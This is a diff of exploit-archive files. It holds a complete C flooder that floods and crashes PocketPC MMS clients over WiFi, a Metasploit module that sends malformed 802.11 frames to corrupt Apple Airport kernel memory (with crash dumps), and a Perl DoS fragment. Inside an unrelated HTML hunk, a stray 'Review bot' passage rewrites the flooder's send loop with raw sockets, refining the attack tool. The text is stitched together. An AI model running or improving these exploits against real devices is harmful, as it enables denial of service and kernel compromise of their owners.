http://www.mulliner.org/pocketpc/ + * http://www.trifinite.org/ + * + **** For educational purposes only! Please use responsible! *** + * + * NotiFlood is a PoC MMS M-notification.ind flooder written to demo the PocketPC + * MMS Composer vulnerabilities for my DEFCON-14 talk "Advanced Attacks Against + * PocketPC Phones". + * + * The tool sends MMS new message notifications to the target PocketPC device over + * WiFi IP:UDP4:2948. In flood mode the device plays the new message sound for + * every received notification. If auto receive is enabled the phone will try to + * dial-up GPRS in order to receive the message. After receiving a couple + * hundred messages the phone randomly freezes or rejects new messages. Further + * the MMS inbox is filled up with messages that only can be deleted manually + * one-by-one. 
In crash mode, each notification crashes the MMS client and + * therefore actively keeps the user from using the Inbox application while + * connected to WiFi (the Inbox application also handles email like via POP3 and + * IMAP). + * + * This was tested with WinCE 4.2x and MMS Composer 1.5 and 2.0 + * + * Examples: + * flood all clients in 192.168.1/24: + * notiflood -d 192.168.1.255 -n 0 + * + * crash client at: 192.168.42.29: + * notiflood -d 192.168.42.29 -i 500000 -n 1 -c + * + */ + +#include +#include +#include +#include +#include +//#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int mms1_pos[] = {40, 106, 167, 228, 289}; + +unsigned char mms1[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x97,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x96,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2
d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8e,0x66,0x68,0x32,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0xd0,0x00}; + +unsigned char mms2[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41
,0x41,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x97,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x96,0x1f,0x35,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41
,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00}; + +int mms2_pos[] = { 40, 314, 375, 436, 489 }; + +char to[100] = {"receiver@receiver.com"}; +char from[100] = {"sender@sender.net"}; +char subject[100] = {"Your P0ckEtPC just P00PED itself!"}; + +unsigned int iteration = 0; + +void iterate(unsigned char *nty, int *pos) +{ + char tmp[57]; + char tmp2[57]; + + sprintf(tmp, "%u%u", time(NULL), iteration); + memset(&nty[pos[0]], '0', 57); + memcpy(&nty[pos[0]], tmp, (strlen(tmp) < 57) ? strlen(tmp) : 56); + + sprintf(tmp2, "http://127.0.0.1/?%s",tmp); + memset(&nty[pos[4]], '0', 57); + memcpy(&nty[pos[4]], tmp2, (strlen(tmp2) < 57) ? strlen(tmp2) : 56); +} + + +void init(unsigned char *nty, int *pos) +{ + memset(&nty[pos[1]], ' ', 56); + memcpy(&nty[pos[1]], from, (strlen(from) < 57) ? strlen(from) : 56); + memset(&nty[pos[2]], ' ', 56); + memcpy(&nty[pos[2]], to, (strlen(to) < 57) ? strlen(to) : 56); + memset(&nty[pos[3]], ' ', 56); + memcpy(&nty[pos[3]], subject, (strlen(subject) < 57) ? 
strlen(subject) : 56); +} + +void usage() +{ + printf(""\ + "notiflood - proof-of-concept PocketPC MMS Composer m-notification.ind flooder\n\n"\ + " (c) 2006 Collin Mulliner \n"\ + " http://www.mulliner.org/pocketpc/ | http://www.trifinite.org\n\n"\ + " for educational purposes only, please use responsible!\n\n"\ + "options:\n"\ + "\t-d destination ip (broadcast works!)\n"\ + "\t-i interval (useconds)\n"\ + "\t-n number of packets (0=unlimited)\n"\ + "\t-s subject\n"\ + "\t-f from\n"\ + "\t-t to\n"\ + "\t-c crash client\n"\ + "\t-F flip-flop between crash / start client\n"\ + "\t-h help\n"\ + "\t-q quiet\n\n"); + +} + +int main(int argc, char **argv) +{ + int f, i, l = 0; + char system_cmd[200]; + int mode = 0; // 0 = flood , 1 = crash , 2 = flip-flop + int opt; + char dest[20] = {0}; + int interval = 500000; + unsigned int num = 0; + int verbose = 1; + int flipflop = 0; + + + while ((opt = getopt(argc, argv, "i:n:d:s:t:f:cqhF")) != EOF) { + switch (opt) { + case 'd': + strncpy(dest, optarg, 19); + break; + case 's': + strncpy(subject, optarg, 56); + break; + case 't': + strncpy(to, optarg, 56); + break; + case 'f': + strncpy(from, optarg, 56); + break; + case 'c': + mode = 1; + break; + case 'F': + mode = 2; + break; + case 'n': + num = atoi(optarg); + break; + case 'i': + interval = atoi(optarg); + break; + case 'q': + verbose = 0; + break; + default: + case 'h': + usage(); + break; + } + } + + if (optind < argc) { + usage(); + exit(-1); + } + if (strlen(dest) == 0) { + usage(); + exit(-1); + } + + sprintf(system_cmd, "cat mmsflood.fld|socat udp4:%s:2948,broadcast stdin &", dest); + + init(mms1, mms1_pos); + init(mms2, mms2_pos); + + if (verbose) { + printf("to: %s\n", to); + printf("from: %s\n", from); + printf("subject: %s\n", subject); + printf("dst-ip: %s\n", dest); + if (mode == 1) printf("crash client\n"); + else if (mode == 0) printf("fillup client inbox\n"); + else printf("flip-flop mode\n"); + printf("flood interval: %d seconds\n", interval); + 
printf("number of packets: %d (0=unlimited)\n", num); + } + + if (mode == 2) { + flipflop = 1; + } + + do { + iteration++; + f = open("mmsflood.fld", O_CREAT|O_RDWR|O_TRUNC, 00666); + if (mode == 0) { // flood + iterate(mms1, mms1_pos); + write(f, mms1, sizeof(mms1)); + } + else if (mode == 1) { // crash + iterate(mms2, mms2_pos); + write(f, mms2, sizeof(mms2)); + } + close(f); + system(system_cmd); + if (flipflop == 1) { + if (mode == 0) mode = 1; + else mode = 0; + } + if (interval > 0) usleep(interval); + } while ((iteration < num && num != 0) || num == 0); + + return(0); +} + +// milw0rm.com [2006-08-09] diff --git a/platforms/hardware/dos/2176.html b/platforms/hardware/dos/2176.html index 66e687072..a2938c988 100755 --- a/platforms/hardware/dos/2176.html +++ b/platforms/hardware/dos/2176.html @@ -1,37 +1,37 @@ - - - - -Nokia Browser Crash by Qode
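Review bot: The `-d` argument is interpolated unescaped into a shell command in main, `sprintf(system_cmd, "cat mmsflood.fld|socat udp4:%s:2948,broadcast stdin &", dest)`, and executed through `system()` on every iteration, so any shell metacharacters in `dest` run as commands; the loop also leaves a world-writable (`00666`) `mmsflood.fld` in the current directory with the `open()` and `write()` results unchecked. Because the payloads are already byte arrays, the shell and temp-file detour can be replaced by one UDP socket with `SO_BROADCAST` set and a `sendto()` per iteration, with `inet_pton` rejecting anything that is not a dotted quad, after which `system_cmd` and `f` can be dropped. Separately, `sprintf(tmp, "%u%u", time(NULL), iteration)` in iterate passes a `time_t` to `%u`, a type mismatch that is undefined on 64-bit targets; `snprintf(tmp, sizeof tmp, "%lu%u", (unsigned long)time(NULL), iteration)` is the portable form. The include list was stripped by extraction, so I cannot tell whether `<arpa/inet.h>` and `<netinet/in.h>` are already present; main starts and ends inside the hunk.
```c
	/* … unchanged: option parsing and argument checks … */
	int sock = socket(AF_INET, SOCK_DGRAM, 0);
	int one = 1;
	struct sockaddr_in sin;

	memset(&sin, 0, sizeof sin);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(2948);
	if (sock < 0 || setsockopt(sock, SOL_SOCKET, SO_BROADCAST, &one, sizeof one) < 0) {
		perror("socket");
		exit(-1);
	}
	if (inet_pton(AF_INET, dest, &sin.sin_addr) != 1) {	/* only a dotted quad is accepted; no shell ever sees it */
		usage();
		exit(-1);
	}
	/* … unchanged: init() of both payloads, verbose banner, flip-flop setup … */
	do {
		iteration++;
		if (mode == 0) {		/* flood */
			iterate(mms1, mms1_pos);
			if (sendto(sock, mms1, sizeof mms1, 0, (struct sockaddr *)&sin, sizeof sin) < 0)
				perror("sendto");
		}
		else if (mode == 1) {	/* crash */
			iterate(mms2, mms2_pos);
			if (sendto(sock, mms2, sizeof mms2, 0, (struct sockaddr *)&sin, sizeof sin) < 0)
				perror("sendto");
		}
		/* … unchanged: flip-flop toggle and usleep() … */
	} while ((iteration < num && num != 0) || num == 0);
	close(sock);
```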
- - - - - -# milw0rm.com [2006-08-13] + + + + +Nokia Browser Crash by Qode
+ + + + + +# milw0rm.com [2006-08-13] diff --git a/platforms/hardware/dos/262.pl b/platforms/hardware/dos/262.pl index 4a7c74c1b..5bc4e9982 100755 --- a/platforms/hardware/dos/262.pl +++ b/platforms/hardware/dos/262.pl @@ -85,6 +85,6 @@ sub exploit if ($menu_opt == 3){while (<$SOCKET>){print}} close($SOCKET); } - - -# milw0rm.com [2001-01-27] + + +# milw0rm.com [2001-01-27] diff --git a/platforms/hardware/dos/2700.rb b/platforms/hardware/dos/2700.rb index 9154c3d06..2eaedf938 100755 --- a/platforms/hardware/dos/2700.rb +++ b/platforms/hardware/dos/2700.rb 
@@ -1,165 +1,165 @@ -# A proof-of-concept exploit has been added to the Metasploit Framework 3.0 source tree: -# msf > use auxiliary/dos/wireless/daringphucball - -require 'msf/core' - -module Msf - -class Auxiliary::Dos::Wireless::DaringPhucball < Msf::Auxiliary - - include Exploit::Lorcon - - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption', - 'Description' => %q{ - The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) - is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning - mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading - to arbitrary code execution. This vulnerability is triggered when a probe response frame is received - that does not contain valid information element (IE) fields after the fixed-length header. The data - following the fixed-length header is copied over internal kernel structures, resulting in memory - operations being performed on attacker-controlled pointer values. 
- }, - - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 3666 $' - )) - register_options( - [ - OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), - OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) - end - - # - # This bug is easiest to trigger when the card has been placed into active scan mode: - # $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000 - # - - def run - open_wifi - - cnt = datastore['COUNT'].to_i - - print_status("Creating malicious probe response frame...") - frame = create_frame() - - print_status("Sending #{cnt} frames...") - 0.upto(cnt) { |i| wifi.write(frame) } - end - - def eton(addr) - addr.split(':').map { |c| c.hex.chr }.join - end - - def create_frame - bssid = Rex::Text.rand_text(6) - seq = [rand(255)].pack('n') - caps = [rand(65535)].pack('n') - - frame = - "\x50" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - bssid + # src - bssid + # bssid - seq + # seq - Rex::Text.rand_text(8) + # timestamp value - Rex::Text.rand_text(2) + # beacon interval - Rex::Text.rand_text(2) # capabilities - - frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4) - - return frame - - end -end -end - -=begin - -Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006) - -Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260 -Latest crash info for cpu 0: - Exception state (sv=0x3AA12A00) - PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) - Backtrace: -0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 - 0x002CFA5C 0x000A9314 - Kernel loadable modules in backtrace (with dependencies): - com.apple.driver.AppleAirPort(3.4.4)@0x797000 - dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 
-Proceeding back via exception chain: - Exception state (sv=0x3AA12A00) - previously dumped as "Latest" state. skipping... - Exception state (sv=0x31F13A00) - PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) - -Kernel version: -Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC - - - -(gdb) showcurrentstacks -task vm_map ipc_space #acts pid proc command -0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task - activation thread pri state wait_queue wait_event - 0x01a7c000 0x01a7c000 82 R - reserved_stack=0x173b0000 - kernel_stack=0x17440000 - stacktop=0x17443b60 - 0x17443b60 0x1bc80ac - 0x17443be0 0x7a1d48 - 0x17443c60 0x79fa54 - 0x17443ce0 0x79ff94 - 0x17443d90 0x79febc - 0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> - 0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> - 0x17443e90 0xa9314 - stackbottom=0x17443e90 - - -(gdb) x/3i $pc -0x7a2260 : lbz r8,0(r2) -0x7a2264 : addi r2,r2,1 -0x7a2268 : stw r2,0(r11) - -(gdb) i r $r2 -r2 0xdefacf7 233811191 - -(gdb) x/x $r11 -0x17443bb8: 0x0defacf7 - - -(gdb) bt -#0 0x007a2260 in mhp.1762 () -#1 0x007a1d48 in mhp.1762 () -warning: Previous frame identical to this frame (corrupt stack?) 
-#2 0x007a1d48 in mhp.1762 () -#3 0x0079fa54 in mhp.1762 () -#4 0x0079ff94 in mhp.1762 () -#5 0x0079febc in mhp.1762 () -#6 0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196 -#7 0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267 - - -(gdb) x/40x $r1 -0x17443b60: 0x17443be0 0x22424022 0x01bc80ac 0x00000038 -0x17443b70: 0x00d43c54 0x0004ffff 0x01bc81f4 0x00000210 -0x17443b80: 0x02275000 0x003d8000 0x004fa418 0x00365000 -0x17443b90: 0x01d803c0 0x00033e88 0x01a7c01c 0x01a7c0a4 -0x17443ba0: 0x0defaced 0x01bc8000 0x0227581e 0x0defacf7 -0x17443bb0: 0x00000000 0x0227581e 0x0defacf7 0x00000001 -0x17443bc0: 0x00000002 0x01bc81f4 0x00000000 0x00000000 -0x17443bd0: 0x17443c10 0x01a858c0 0x17443be0 0x01d80d40 -0x17443be0: 0x17443c60 0x01bc81f4 0x007a1d48 0x00000000 -0x17443bf0: 0x17443c20 0x00008088 0x01bc8000 0x0227581e - -=end - -# milw0rm.com [2006-11-01] +# A proof-of-concept exploit has been added to the Metasploit Framework 3.0 source tree: +# msf > use auxiliary/dos/wireless/daringphucball + +require 'msf/core' + +module Msf + +class Auxiliary::Dos::Wireless::DaringPhucball < Msf::Auxiliary + + include Exploit::Lorcon + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption', + 'Description' => %q{ + The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) + is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning + mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading + to arbitrary code execution. This vulnerability is triggered when a probe response frame is received + that does not contain valid information element (IE) fields after the fixed-length header. 
The data + following the fixed-length header is copied over internal kernel structures, resulting in memory + operations being performed on attacker-controlled pointer values. + }, + + 'Author' => [ 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3666 $' + )) + register_options( + [ + OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), + OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) + ], self.class) + end + + # + # This bug is easiest to trigger when the card has been placed into active scan mode: + # $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000 + # + + def run + open_wifi + + cnt = datastore['COUNT'].to_i + + print_status("Creating malicious probe response frame...") + frame = create_frame() + + print_status("Sending #{cnt} frames...") + 0.upto(cnt) { |i| wifi.write(frame) } + end + + def eton(addr) + addr.split(':').map { |c| c.hex.chr }.join + end + + def create_frame + bssid = Rex::Text.rand_text(6) + seq = [rand(255)].pack('n') + caps = [rand(65535)].pack('n') + + frame = + "\x50" + # type/subtype + "\x00" + # flags + "\x00\x00" + # duration + eton(datastore['ADDR_DST']) + # dst + bssid + # src + bssid + # bssid + seq + # seq + Rex::Text.rand_text(8) + # timestamp value + Rex::Text.rand_text(2) + # beacon interval + Rex::Text.rand_text(2) # capabilities + + frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4) + + return frame + + end +end +end + +=begin + +Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006) + +Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260 +Latest crash info for cpu 0: + Exception state (sv=0x3AA12A00) + PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) + Backtrace: +0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 + 0x002CFA5C 0x000A9314 + 
Kernel loadable modules in backtrace (with dependencies): + com.apple.driver.AppleAirPort(3.4.4)@0x797000 + dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 +Proceeding back via exception chain: + Exception state (sv=0x3AA12A00) + previously dumped as "Latest" state. skipping... + Exception state (sv=0x31F13A00) + PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) + +Kernel version: +Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC + + + +(gdb) showcurrentstacks +task vm_map ipc_space #acts pid proc command +0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task + activation thread pri state wait_queue wait_event + 0x01a7c000 0x01a7c000 82 R + reserved_stack=0x173b0000 + kernel_stack=0x17440000 + stacktop=0x17443b60 + 0x17443b60 0x1bc80ac + 0x17443be0 0x7a1d48 + 0x17443c60 0x79fa54 + 0x17443ce0 0x79ff94 + 0x17443d90 0x79febc + 0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> + 0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> + 0x17443e90 0xa9314 + stackbottom=0x17443e90 + + +(gdb) x/3i $pc +0x7a2260 : lbz r8,0(r2) +0x7a2264 : addi r2,r2,1 +0x7a2268 : stw r2,0(r11) + +(gdb) i r $r2 +r2 0xdefacf7 233811191 + +(gdb) x/x $r11 +0x17443bb8: 0x0defacf7 + + +(gdb) bt +#0 0x007a2260 in mhp.1762 () +#1 0x007a1d48 in mhp.1762 () +warning: Previous frame identical to this frame (corrupt stack?) 
+#2 0x007a1d48 in mhp.1762 () +#3 0x0079fa54 in mhp.1762 () +#4 0x0079ff94 in mhp.1762 () +#5 0x0079febc in mhp.1762 () +#6 0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196 +#7 0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267 + + +(gdb) x/40x $r1 +0x17443b60: 0x17443be0 0x22424022 0x01bc80ac 0x00000038 +0x17443b70: 0x00d43c54 0x0004ffff 0x01bc81f4 0x00000210 +0x17443b80: 0x02275000 0x003d8000 0x004fa418 0x00365000 +0x17443b90: 0x01d803c0 0x00033e88 0x01a7c01c 0x01a7c0a4 +0x17443ba0: 0x0defaced 0x01bc8000 0x0227581e 0x0defacf7 +0x17443bb0: 0x00000000 0x0227581e 0x0defacf7 0x00000001 +0x17443bc0: 0x00000002 0x01bc81f4 0x00000000 0x00000000 +0x17443bd0: 0x17443c10 0x01a858c0 0x17443be0 0x01d80d40 +0x17443be0: 0x17443c60 0x01bc81f4 0x007a1d48 0x00000000 +0x17443bf0: 